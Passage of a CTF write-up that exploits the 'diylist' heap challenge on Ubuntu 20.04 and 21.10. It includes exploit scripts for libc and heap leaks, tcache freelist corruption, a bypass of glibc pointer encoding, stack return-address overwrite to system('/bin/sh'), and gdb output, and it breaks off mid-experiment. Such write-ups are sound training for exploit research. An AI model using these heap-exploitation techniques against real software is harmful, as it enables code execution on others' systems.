exploit_pwn_chgs_ubuntu_21.10

Warm up exercises: preparing for the Ubuntu 21.10 CTFs

CTFs are awesome. It’s a great place for innovation, creativity, learning, and development. Also - it’s super fun.

In the past few years, we saw how the environments used to host challenges had been updated. And we need to keep up with these changes and be aware of the differences between the runtimes, mitigations, available features, etc.. That’s why I thought it might be nice to take an old CTF challenge and solve it on new versions of Ubuntu, to see what changed and what the environment of the future CTFs might look like.

I looked for a pwn challenge from a CTF in 2020, and tried to run its intended/official solution on Ubuntu 20.04 (which is already used to host CTFs) and Ubuntu 21.10. After a short search, I chose “diylist”, a pwn challenge from zer0pts CTF 2020, that used to run on Ubuntu 18.04. The challenge is quite simple, and based on all the three solutions published in ctftime (and on the official/intended solution published in the CTF’s repo), it relied on an outdated bad behavior of tcache (that is mitigated on Ubuntu 20.04).

So, I built an exploit that works on Ubuntu 20.04 with default configuration. Then, because Ubuntu 21.10 has some changes in the allocator behavior (the encoding hardening on freelist entries, disabling malloc hooks, etc.), I built another exploit for Ubuntu 21.10 with default configuration. And just to make it more interesting, I enabled further mitigations that the original challenge did not.

To be organized, I will describe the challenge, what the published solutions did to solve it (they are very similar), detail exactly what I changed and which mitigations I enabled, and how I solved the challenge on both Ubuntu 20.04 and the latest 21.10, and how. This blogpost doesn’t introduce something new/novel, not even close :) But sometimes it’s nice to present the current state-of-the-art, in a lightweight way.

Let’s begin!

Intro to the challenge

The challenge implements a list of elements, and offers us the following operations:

int main(void)
{
  initialize();
  
  List *list = list_new();

  while(1) {
    switch(menu()) {
    case 1: add(list); break;
    case 2: get(list); break;
    case 3: edit(list); break;
    case 4: del(list); break;
    }
  }
}

Each element is defined as a union, and could be one of three different types:

typedef union {
  char *p_char;
  long d_long;
  double d_double;
} Data;

typedef struct {
  int size;
  int max;
  Data *data;
} List;

Because the element structure is defined as a union, the list buffer is simply an array of qwords. Each qword may be a numerical value (long/double) or a pointer to a string (lovely, right?). So, how would the challenge know how to handle each element? Oh, it’s just asking us for its type. That’s the first bug - a straightforward type confusion. For instance, you can clearly see this in the get command handler:

void get(List *list)
{
  printf("Index: ");
  long index = read_long();
  
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);
  
  switch(read_long()) {
  case LIST_LONG:
    printf("Data: %ld\n", list_get(list, index).d_long);
    break;
    
  case LIST_DOUBLE:
    printf("Data: %lf\n", list_get(list, index).d_double);
    break;
    
  case LIST_STRING:
    printf("Data: %s\n", list_get(list, index).p_char);
    break;
    
  default:
    puts("Invalid option");
    return;
  }
}

And list_get looks as follows:

Data list_get(List* list, int index)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  return (Data)list->data[index].p_char;
}

Please note that this bug does not give us memory corruption - we can only write data / pointer to a controlled string to the list->data array. What it gives us is a great information disclosure primitive, and the ability to allocate controlled-content at a known address. By design, we can:

Great, we have arbitrary read primitive we can trigger as many times as we like.

The second vulnerability is double free (which we can convert into an arbitrary free). In order to implement the edit operation, the challenge has this logic:

void list_edit(List* list, int index, Data data, LIST_TYPE type)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");
  
  /* Store the data */
  switch(type) {
  case LIST_LONG:
    list->data[index].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[index].d_double = data.d_double;
    break;
  case LIST_STRING:
    list->data[index].p_char = strdup(data.p_char);
    /* Insert the address to free pool */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = list->data[list->size].p_char;
      fpool_num++;
    }
    break;
  default:
    __list_abort("Invalid type");
  }
}

As you can see, it simply calls strdup on the input from the user and stores the pointer to the newly allocated string to list->data.

Now, when we delete an item, the code needs to know if it’s a pointer to an allocated string buffer (that requires a free). For that, the challenge has the fpool array. Every time a new string is created, it stores its pointer in the fpool array, and every time you call the delete operation, the code scans this array to see if this value is actually a pointer to an allocated string, and if so, frees it:

void list_del(List* list, int index)
{
  int i;
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  Data data = list->data[index];

  /* Shift data list and remove the last one */
  for(i = index; i < list->size - 1; i++) {
    list->data[i] = list->data[i + 1];
  }
  list->data[i].d_long = 0;

  list->size--;

  /* Free data if it's in the pool list (which means it's string) */
  for(i = 0; i < fpool_num; i++) {
    if (fpool[i] == data.p_char) {
      free(data.p_char);
      break;
    }
  }
}

As you can see, this code does not remove the pointer from the array, doesn’t NULL it out, nothing. Therefore, nothing stops us from repeatedly triggering a free on any pointer in the fpool array.

So, to conclude - we have the following bugs/primitives:

Actually, the “multiple free” primitive could be easily converted and treated as arbitrary free. We can just trigger an allocation that reclaims the freed chunk between the two frees, and the second free will just free the newly allocated structure for us. Arbitrary free is a very powerful primitive, and in real workloads, it opens infinite opportunities for us. In our case, because we can confuse integers with pointers, we can write values arbitrarily to list->data, and if we could get these values into the fpool array, we could free them as many times as we like. This is the primitive I’m about to use :)

But first, let’s review what the public solutions have done and which parts don’t work on newer versions.

Existing solutions overview

Please, do not interpret my text as something against those existing solutions; they’ve done a great job! This is how the world works; we run into new hardenings that break previous exploits.

First of all, 2/3 of the solutions from ctftime and the official/intended relied on the fact that the main binary is not under randomization. They used the addresses in the GOT to leak libc (we have arbitrary read by design due to the type confusion). Usually there is randomization on the main binary, so I enabled it in my challenge. Which means that I need another way to leak libc’s address. That’s not a problem because there is a very common technique that everybody does, and still works on latest.

One of the solutions from ctftime actually used this method. It’s very simple: used dlmalloc to leak the base address of libc and resolved symbols (__free_hook, system, etc.). This is a very common trick - read the content of a freed chunk in the unsorted bins, while FD/BK points to a symbol in the main_arena in libc. By leaking this address, we can resolve libc’s addresses. That’s great, works on latest and very common. Indeed, it’s the first thing I’ve done myself.

The problems start with how all the solutions (including the intended one) gained a corruption primitive. The following is from the official/intended solution:

# libc leak (type confusion)
add(1, str(elf.got("puts")))
addr_puts = u64(get(0, 3))
libc_base = addr_puts - libc.symbol("puts")
logger.info("libc base = " + hex(libc_base))

# heap leak (type confusion)
add(3, "A" * 8)
addr_heap = int(get(1, 1))
logger.info("addr heap = " + hex(addr_heap))

# double free (free pool)
edit(0, 1, str(addr_heap))
delete(1)
delete(0)

# tcache poisoning
add(3, p64(elf.got("atol")))
add(3, "A" * 8)
add(3, p64(libc_base + libc.symbol("system")))

sock.interactive()

To sum it up, the TL;DR of what all the existing solutions have done:

  1. leak libc (some relied on lack of randomization of the main binary, one did not)
  2. trigger a “raw” double free, do a tcache attack, gain arbitrary write
  3. corrupt GOT entry in the main binary (again, relies on lack of randomization)

Just to show what happens if you run this approach on modern versions of libc, let’s run it on Ubuntu 20.04:

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x0000ffffab6fcd68 in __GI_abort () at abort.c:79
#2  0x0000ffffab74a29c in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffffab80b480 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x0000ffffab75167c in malloc_printerr (str=str@entry=0xffffab806f78 "free(): double free detected in tcache 2") at malloc.c:5347
#4  0x0000ffffab75328c in _int_free (av=0xffffab846a60 <main_arena>, p=0x1f15a300, have_lock=0) at malloc.c:4201
#5  0x0000000000400ef4 in list_del ()
#6  0x0000000000401484 in del ()
#7  0x0000000000401578 in main ()
(gdb) 

Note the trace in malloc_printerr: “free(): double free detected in tcache 2”. That means the second step (the tcache double-free attack) is broken. This attack was mitigated in Ubuntu a few years ago. Many have talked about it before (example), so I won’t repeat that here. The important part is that it doesn’t work on new versions of libc due to an explicit check, and you’ll get a SIGABRT on that.

However, if we are already looking at pwn challenges, let’s make this more interesting. The solution also takes advantage of lack of few mitigations, such as randomization on the main binary (while there is randomization on libc, by the way). So, to make it more fun, let’s change the following:

My new Makefile looks as follows:

--- a/diylist/challenge/Makefile
+++ b/diylist/challenge/Makefile
@@ -1,12 +1,12 @@
 all:
-       gcc -shared diylist.c -o libdiylist.so -fPIC
-       gcc main.c -o chall -L./ -ldiylist -no-pie
-       strip --strip-all chall
-       cp chall ../distfiles/
+       clang -shared diylist.c -o libdiylist.so -fPIC -fstack-protector -Wl,-z,relro,-z,now
+       clang diylist.c main.c -o chg -fpie -pie -fstack-protector -Wl,-z,relro,-z,now
+       strip --strip-all chg
+       cp chg ../distfiles/

Now, let’s start developing exploits for Ubuntu 20.04 and 21.10.

Exploit - Ubuntu 20.04

I’ve started with leaking libc’s base address. This method is classic for pwn challenges in CTFs, and highly repeats itself. The following code does this:

def leak_ptrs(p):
    add(p, TYPE_STRING, b"A"*0x10)
    for i in range(9):
        add(p, TYPE_STRING, b"C"*0x7f)
    for i in range(8):
        delete(p, 0)

    # leak heap (type confusion)
    heap_addr = int(get(p, 0, TYPE_LONG))

    print("[*] edit list[1] to point to list[0], which has main_arena symbol in its content")
    edit(p, 1, TYPE_LONG, heap_addr)

    print("[*] delete list[0], move list[1] one position backward")
    delete(p, 0)

    print("[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc")
    main_arena = u64(get(p, 0, TYPE_STRING).ljust(8, b"\x00"))

    return (heap_addr, main_arena)

output:

root@a8fed2c03baf:/challenge# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 85839
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/challenge/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0x3b1e7c0
[*] main_arena @ 0xffffa606bac0
[*] resolved addresses:
    libc @ 0xffffa5efe000
    __free_hook @ 0xffffa606e760
    system @ 0xffffa5f41978

Now, armed with heap && libc addresses, let’s get to our corruption primitive. We can’t do “raw” double/multiple free attack on tcache like the existing solutions did, because there are aborts on such old tcache behaviors. The main issue here is that even with this pretty simple type confusion, we can only write data to the list->data array, but we can’t dereference arbitrary memory and write to it. Even when we add/edit strings, our content goes directly to strdup, and the newly allocated string buffer is stored to the list->data array.

However, I came up with an elegant and easy trick: I want to make the list->data array address be in the fpool array, and trigger a free of it.

Sounds good, right? If we could free the list->data array, we could gain a write primitive to a freed chunk! And hey, with dlmalloc, that’s an arbitrary write :) Let’s see how we could do it.

shaping the heap

Well, the “shape” here is very simple. First, we need to understand how the list->data allocation work. This is done in the list_add function:

void list_add(List* list, Data data, LIST_TYPE type)
{
  Data *p;
  
  if (list->size >= list->max) {
    /* Re-allocate a chunk if the list is full */
    Data *old = list->data;
    list->max += CHUNK_SIZE;
    
    list->data = (Data*)malloc(sizeof(Data) * list->max);
    if (list->data == NULL)
      __list_abort("Allocation error");

    if (old != NULL) {
      /* Copy and free the old chunk */
      memcpy((char*)list->data, (char*)old, sizeof(Data) * (list->max - 1));
      free(old);
    }
  }

  /* Store the data */
  switch(type) {
	...
  }
  
  list->size++;
}

Pretty straightforward: if the size of the list is larger/equal to its max capacity, we need to do realloc (that’s basically what the code above does). The sizes of the allocation of this array are: 0x20, 0x40, 0x60, 0x80, 0xd0. And obviously, once it gets to a certain size, it won’t decrease.

I chose to target 0x60. That doesn’t really matter, because we can exploit this with any size. One of the reasons is that my goal is to create a hole by allocating a string and freeing it, and we can’t allocate a string longer than 0x80. Yes, we can achieve that by trigger a coalesce etc., but I think 0x60 is a fine target here.

This will be our exploit now:

list_ptr = create_dangling_ptr_in_fpool(p)
print("[*] good, now fpool[0] points to list. list_ptr == 0x%x" % list_ptr)

heap_addr, main_arena = leak_ptrs(p)
print("[*] heap_addr @ 0x%x" % heap_addr)
print("[*] main_arena @ 0x%x" % main_arena)
def create_dangling_ptr_in_fpool(p):
    add(p, TYPE_STRING, b"R"*0x60)
    list_ptr = int(get(p, 0, TYPE_LONG))
    delete(p, 0)

    for i in range(8):
        add(p, TYPE_LONG, bytes(str(0), "utf-8"))
    for i in range(8):
        delete(p, 0)

    return list_ptr

Now, all we need to do, is to use the edit command, write the address of the list->data array to one of its own elements, and free it! Then, we could call edit again, write arbitrary numerical values to the FD/BK in the freed chunk, and gain arbitrary write. Let’s test it out:

    # start corruption phase!
    strings_idx = []
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    strings_idx.append(add(p, TYPE_STRING, b"P"*0x60))
    delete(p, strings_idx[:-1])

    print("[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write")
    edit(p, 1, TYPE_LONG, list_data_ptr)
    delete(p, 1)
    
    print("[*] corrupt list_data_ptr->FD, make it point to __free_hook")
    #edit(p, 0, TYPE_LONG, free_hook-0x58)
    edit(p, 0, TYPE_LONG, 0x41414141)
    edit(p, 1, TYPE_LONG, 0)
   
    for i in range(3):
        fake = b"A"*0x58
        fake += p64(system_addr)
        add(p, TYPE_STRING, fake)

And indeed, we segfault in malloc, when it parses our controlled value as a freelist entry:

Program received signal SIGSEGV, Segmentation fault.
__GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3051
3051	malloc.c: No such file or directory.
(gdb) x/2i $pc
=> 0xffff8410e8e8 <__GI___libc_malloc+272>:	ldr	x3, [x4]
   0xffff8410e8ec <__GI___libc_malloc+276>:	str	x3, [x19, #128]
(gdb) i r x4
x4             0x41414141          1094795585
(gdb) 

The decimal representation problem

And now, there is something annoying. When we try to corrupt __free_hook, we failed:

Program received signal SIGSEGV, Segmentation fault.
__GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3051
3051	malloc.c: No such file or directory.
(gdb) x/2i $pc
=> 0xffff7fca88e8 <__GI___libc_malloc+272>:	ldr	x3, [x4]
   0xffff7fca88ec <__GI___libc_malloc+276>:	str	x3, [x19, #128]
(gdb) i r x4
x4             0x19998cc8fa4d      28147282672205
(gdb) 

What’s going on?

So, as it turns out - we are missing out one byte. Yes, you read it right. That’s the functions that read our differnet kind of inputs:

long read_long(void)
{
  char buf[16];
  read(0, buf, 14);
  return atol(buf);
}

double read_double(void)
{
  char buf[16];
  read(0, buf, 14);
  return atof(buf);
}

void read_str(char *buf)
{
  int size = read(0, buf, 127);
  char *nl = strchr(buf, '\n');
  if (nl != NULL) {
    *nl = '\x00';
  } else {
    buf[size] = 0;
  }
}

And, the address of __free_hook is something like that (up to ASLR randomization of course):

>>> 0xffff7fd9c760
281472826722144
>>> len(str(_))
15
>>> 

That’s one byte too short :( And yes, that’s the value we get when our last byte is not read. Indeed, all the published solutions used the add/edit commands to write addresses in the main binary (which are very low in this case, there is no ASLR).

Therefore, we can’t write high addresses (such as libc’s). However, we can send a string with content that is a libc address (as long there are no NULL bytes, of course); for this, we need first to write the address of some good target to corrupt, which is where GOT entries come to play (there is no proper RELRO as well).

But I won’t just stand here and claim that this is what breaks our entire approach. We can quickly test that. Let’s just patch/rebuild the binary, remove this 14 characters restriction, and run our new exploit. I simply changed the “14” in read_long to 15 and reran my exploit:

diff --git a/diylist/challenge/main.c b/diylist/challenge/main.c
index b7422aa..1f20216 100644
--- a/diylist/challenge/main.c
+++ b/diylist/challenge/main.c
@@ -7,7 +7,7 @@
 long read_long(void)
 {
   char buf[16];
-  read(0, buf, 14);
+  read(0, buf, 15);
   return atol(buf);
 }

And, the output:

root@0f5b4da89c72:/chg# python3 solve.py 
[+] Starting local process './distfiles/chg': pid 130
attach
[*] '/lib/aarch64-linux-gnu/libc.so.6'
    Arch:     aarch64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/chg/distfiles/chg'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaaddf4e2f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.8/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaaddf4e7c0
[*] main_arena @ 0xffff96d07ac0
[*] resolved addresses:
    libc @ 0xffff96b9a000
    __free_hook @ 0xffff96d0a760
    system @ 0xffff96bdd978
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to __free_hook
[*] __free_hook('/bin/sh/')
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 20.04.2 LTS
Release:    20.04
Codename:    focal
$ ls
challenge  distfiles  flag.txt    solve.py
$ cat flag.txt
ThisIsMyFlag
$ 
[*] Interrupted
[*] Stopped process './distfiles/chg' (pid 130)
root@0f5b4da89c72:/chg# 

Everything works! So we know what our problem is – we just need to be able to send a long value that represents a libc’s address, with the 14 characters restriction for the decimal representation. This is important, because unfortunatley, atol/atof works only with decimal inputs (unlike strtol, for instance, which parses prefixes, and therefore we could send “0x…”).

Ideas for bypassing the 14-characters issue

Well, I had some ideas here I would like to note. I think it’s pretty trivial, but just for the sake of completness.

  1. Negative values and TBI: first of all, while atol doesn’t parse the “0x” prefix, it does parse negative values. Therefore, we could easily get values with high-bit set on. However, that’s pointless, because this values represents kernel addresses.

    I could be really annoying and say “hey, if the challenge would enable TBI (Top-Byte-Ignore), I could have used that!” (sorry, I had to say that :P). Well, that’s true, but the challenge does not enable TBI, and even if it does, it won’t help. The read_long function returns the value in a 64-bit register, and the code uses 32-bit types. Therefore, we will always have sign extension and the value will be huge. So even if the address translation will ignore the MSB, many other bytes will be 0xf anyways, and we can’t create libc’s address with that.

  2. Uninitialized stack buffer: that’s a more relevant idea. You probably note the read_long and read_double functions are vulnerable to an uninitialize bug! You can easily see this in the source code snippets I pasted above. The function reads 14 bytes into buf, which is an uninitialized, 16 bytes on the stack. It’s very clear from the binary as well:

    .text:0000000000400F14 nptr= -0x18
    .text:0000000000400F14 buf= -0x10
    .text:0000000000400F14 var_s0=  0
    .text:0000000000400F14
    .text:0000000000400F14 SUB             SP, SP, #0x30
    .text:0000000000400F18 STP             X29, X30, [SP,#0x20+var_s0]
    .text:0000000000400F1C ADD             X29, SP, #0x20
    .text:0000000000400F20 MOV             W8, WZR
    .text:0000000000400F24 MOV             X2, #0xE ; nbytes
    .text:0000000000400F28 ADD             X9, SP, #0x20+buf
    .text:0000000000400F2C MOV             W0, W8  ; fd
    .text:0000000000400F30 MOV             X1, X9  ; buf
    .text:0000000000400F34 STR             X9, [SP,#0x20+nptr]
    .text:0000000000400F38 BL              .read
    .text:0000000000400F3C LDR             X9, [SP,#0x20+nptr]
    .text:0000000000400F40 MOV             X0, X9  ; nptr
    .text:0000000000400F44 BL              .atol
    .text:0000000000400F48 LDP             X29, X30, [SP,#0x20+var_s0]
    .text:0000000000400F4C ADD             SP, SP, #0x30 ; '0'
    .text:0000000000400F50 RET
    .text:0000000000400F50 ; End of function read_long
    

    In theory, we could shape the stack (by calling functions that writes data to the stack) and hopefully set the 15th byte to an controlled/paritally controlled value. Unfortunaltey, I didn’t find a flow in the challenge that gets that far on the stack.

Eventually, because we did solve a more “relevant” challenge to today’s libc versions and with further mitigations enabled, and the whole point of this blogpost is to exploit the challenge on Ubuntu 21.10, I decided to leave it and just rebuild the challenge with 15 bytes read in read_long :P I could replace the atol call with strtol, but that’s a bigger change and I would like to change as less as possible. And just to be clear, this is the only change I did to the codebase in the challenge.

Now, let’s start the interesting part.

Exploit - Ubuntu 21.10

Well, if you would run this exploit on Ubuntu 21.10, you’ll get the following abort:

Program received signal SIGABRT, Aborted.
__pthread_kill_implementation (threadid=281473079164944, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
44	pthread_kill.c: No such file or directory.
(gdb) bt
#0  __pthread_kill_implementation (threadid=281473079164944, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x0000ffff8ecf9114 in __pthread_kill_internal (signo=<optimized out>, threadid=<optimized out>) at pthread_kill.c:80
#2  0x0000ffff8ecb3f7c in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x0000ffff8eca0d30 in __GI_abort () at abort.c:79
#4  0x0000ffff8eced078 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffff8edcef60 "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#5  0x0000ffff8ed0369c in malloc_printerr (str=str@entry=0xffff8edcaa20 "malloc(): unaligned tcache chunk detected") at malloc.c:5543
#6  0x0000ffff8ed076d8 in tcache_get (tc_idx=<optimized out>) at malloc.c:3082
#7  __GI___libc_malloc (bytes=bytes@entry=95) at malloc.c:3200
#8  0x0000ffff8ed0a1f0 in __GI___strdup (s=0xffffdf753368 'A' <repeats 88 times>, "<\347\316\216\377\377") at strdup.c:42
#9  0x0000ffff8ee20a68 in ?? ()
#10 0x64253d676e6f6c28 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)

Interesting. What’s going on here?

freelist hardening

Indeed, new versions of libc include further mitigation that protects freelist entries. This hardening was detailed in a few blogposts before (example), so I won’t cover it here (no point in repeating content). As was demonstrated before, this mitigation is easily bypassable, and it’s basically built upon the assumption that the attacker does not have the knowledge of “where the heap is”.

Well, we certainly do know where the heap is. So, let’s dig, bypass this, and conclude with an exploit that works for the latest version of Ubuntu as well. To be honest, it couldn’t be easier:

    # bypassing new pointer encoding
    last_freed = int(get(p, strings_idx[-1], TYPE_LONG))
    print("[*] last_freed == 0x%x" % last_freed)
    delete(p, strings_idx[:-1])

    print("[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write")
    edit(p, 1, TYPE_LONG, list_data_ptr)
    delete(p, 1)

    print("[*] corrupt list_data_ptr->FD, make it point to __free_hook")
    target_addr = (free_hook-0x58) ^ (last_freed >> 12)
    edit(p, 0, TYPE_LONG, target_addr)

Let’s see if our arbitrary write worked out. This is the output until the last call to free:

[*] good, now fpool[0] points to list. list_data_ptr == 0xaaaaf28072f0
[*] edit list[1] to point to list[0], which has main_arena symbol in its content
/usr/local/lib/python3.9/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] delete list[0], move list[1] one position backward
[*] read the dangling pointer in list[0] with TYPE_STRING, leak libc
[*] heap_addr @ 0xaaaaf28077c0
[*] main_arena @ 0xffff8b95cb48
[*] resolved addresses:
    libc @ 0xffff8b7c1000
    __free_hook @ 0xffff8b9634a8
    system @ 0xffff8b80b6b4
[*] last_freed == 0xaaaaf2807950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to __free_hook
[*] __free_hook('/bin/sh/') 

Breaking into the debugger, and dumping the __free_hook address we read:

(gdb) x/8gx 0xffff8b9634a8 
0xffff8b9634a8 <__free_hook>:	0x0000ffff8b80b6b4	0x0000000000000000
0xffff8b9634b8 <__after_morecore_hook>:	0x0000000000000000	0x0000000000000000
0xffff8b9634c8 <mallwatch>:	0x0000000000000000	0x0000000000000000
0xffff8b9634d8 <olds.0>:	0x0000000000000000	0x0000000000000000
(gdb) x/4i 0x0000ffff8b80b6b4
   0xffff8b80b6b4 <__libc_system>:	cbz	x0, 0xffff8b80b6bc <__libc_system+8>
   0xffff8b80b6b8 <__libc_system+4>:	b	0xffff8b80b220 <do_system>
   0xffff8b80b6bc <__libc_system+8>:	str	x30, [sp, #-16]!
   0xffff8b80b6c0 <__libc_system+12>:	adrp	x0, 0xffff8b912000
(gdb) 

It works, we’ve got our arbitrary write back :) Unfortunaltey, system() wasn’t called. Why?

malloc hooks

As it turns out, the malloc hooks were disabled upon new versions of libc. So, corrupting __free_hook doesn’t help us anymore. For more information regarding this, check out this article.

corrupt the stack

Well, we don’t need to worry. We have arbitrary write, as many arbitrary read as we want, (almost-)controlled content at known addresses, and we know libc’s base. Nothing can stop us now; we already won. I decided to go old school, and just do the following plan:

First, let me define the proper arbitrary_read function (we did it before, it’s very simple):

def arbitrary_read(p, addr):
    idx = add(p, TYPE_LONG, bytes(str(addr), "utf-8"))
    val = u64(get(p, idx, TYPE_STRING)[:8].ljust(8, b"\x00"))
    delete(p, idx)
    return val

After implementing the stack scan (see the code), we could go back to our exploit, and use our arbitrary write (through the return value of malloc) to corrupt the stack. However, because we have to write 0x60 bytes (we can a little less, but you get the idea), I expect the stack cookie to crash us. Let’s see:

Program received signal SIGABRT, Aborted.
__pthread_kill_implementation (threadid=281473748176912, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
44	pthread_kill.c: No such file or directory.
(gdb) bt
#0  __pthread_kill_implementation (threadid=281473748176912, signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x0000ffffb6afe114 in __pthread_kill_internal (signo=<optimized out>, threadid=<optimized out>) at pthread_kill.c:80
#2  0x0000ffffb6ab8f7c in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#3  0x0000ffffb6aa5d30 in __GI_abort () at abort.c:79
#4  0x0000ffffb6af2078 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0xffffb6bd2470 "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155
#5  0x0000ffffb6b74248 in __GI___fortify_fail (msg=msg@entry=0xffffb6bd2458 "stack smashing detected") at fortify_fail.c:26
#6  0x0000ffffb6b74214 in __stack_chk_fail () at stack_chk_fail.c:24
#7  0x0000aaaac0030ecc in add ()
#8  0x0000ffffb6ac56b4 in cancel_handler (arg=0xffffcf485028) at ../sysdeps/posix/system.c:96
#9  0x00000000b6aa5fc0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)

Yep, no surprises here: __stack_chk_fail indeed trigger the expected abort.

Just to make sure we corrupted the return address I intended, let’s disable the stack cookie for a second, and rerun our exploit. Set a breakpoint on system:

Breakpoint 1, __libc_system (line=0xffffd47cfdb0 'A' <repeats 64 times>) at ../sysdeps/posix/system.c:202
202	../sysdeps/posix/system.c: No such file or directory.
(gdb) x/18gx $x0
0xffffd47cfdb0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdc0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdd0:	0x4141414141414141	0x4141414141414141
0xffffd47cfde0:	0x4141414141414141	0x4141414141414141
0xffffd47cfdf0:	0x0000000000000000	0x4141414141414141
0xffffd47cfe00:	0x4141414141414141	0x0000ffff850756b4
0xffffd47cfe10:	0x0000000000000000	0x0000000000000000
0xffffd47cfe20:	0x0000aaaaf9a0e2a0	0x0000000085055fc0
0xffffd47cfe30:	0x0000ffffd47cfe40	0x0000ffff85055ffc
(gdb) x/2i 0x0000ffff850756b4
=> 0xffff850756b4 <__libc_system>:	cbz	x0, 0xffff850756bc <__libc_system+8>
   0xffff850756b8 <__libc_system+4>:	b	0xffff85075220 <do_system>
(gdb) 

Yes, we did! We corrupted a return address, and conveniently enough (well, I targeted this flow on purpose :) ), the first argument is our controlled string! And you can see that after our 0x41s, we have the address of system. That’s because it’s our arbitrary write primitive, and I set the target address of the arbitrary write to be return_addr-0x58 (a reminder: we corrupted freelist entry, and we need 0x60 allocation in order to get that).

Well, there are two problems we need to solve:

Let’s see the second problem in action. You can see that our command clearly fails:

[*] env_ptr == ffffd47cffd8
[*] stack_addr == 0xffffd47d0fcc
[*] found good return address! *(0xffffd47cfe38) == 0xffff85055ffc
[*] last_freed == 0xaaaaf9a0e950
[*] trigger a free of the list pointer, and call edit to corrupt FD and gain arbitrary write
[*] corrupt list_data_ptr->FD, make it point to our callback target
[*] target_addr == 0xffffd47cfdb0
[*] exploit done, system('/bin/sh') achieved, call interactive()
[*] Switching to interactive mode
sh: 1: \xb0u!\x85\xff\xff: not found
$  

Yep, sh complains (rightfully) that this sequence of bytes (some VA) is not found. This happens because system actually corrupts our argument. Well, it has every right. We “allocated” it on the stack, and system allocated this stack frame for itself when it started. When you think about it, what we did is not cool.

That’s fine, we can solve both of these problems. That shouldn’t be an issue. We have as many arbitrary reads as we like, and we know the layout of most of the virtual address space. So leak the stack cookie is trivial. However, we can’t have NULL bytes in our allocated string, and the cookie has one NULL byte. And because our arbitrary write has to be a string that triggers an allocation of 0x60 bytes, that’s an issue we need to solve.

However, I want to try another approach, that would be much more elegant and simple :)

The last step - r/w to the stack - for the win

I think we’ll all be happier if we would go for elegant tricks. And you know what elegant? Well, in my opinion, it would be super fun if we’ll corrupt the list structure itself (not list->data content, which we can write arbitrary values by design; the actual list structure):

typedef struct {
  int size;
  int max;
  Data *data;
} List;

Then, we can make list->data points to the stack! Then we could use get/edit operations to simply read/write to the stack, and we are done. Let’s test it out:

    faked_size = 0x22222222
    for i in range(2):
        fake = b"D" * (corrupt_prefix_length)
        fake += p32(faked_size) # size
        fake += p32(0x7fffffff) # max, avoid reallocation
        fake += p64(return_addr - faked_size * 8  + 0x10*8)
        add(p, TYPE_STRING, fake)

    # now list->data points to the stack. Test it out: let's corrupt the return address
    edit(p, faked_size - 0x10, TYPE_LONG, 0x4141414141)

And:

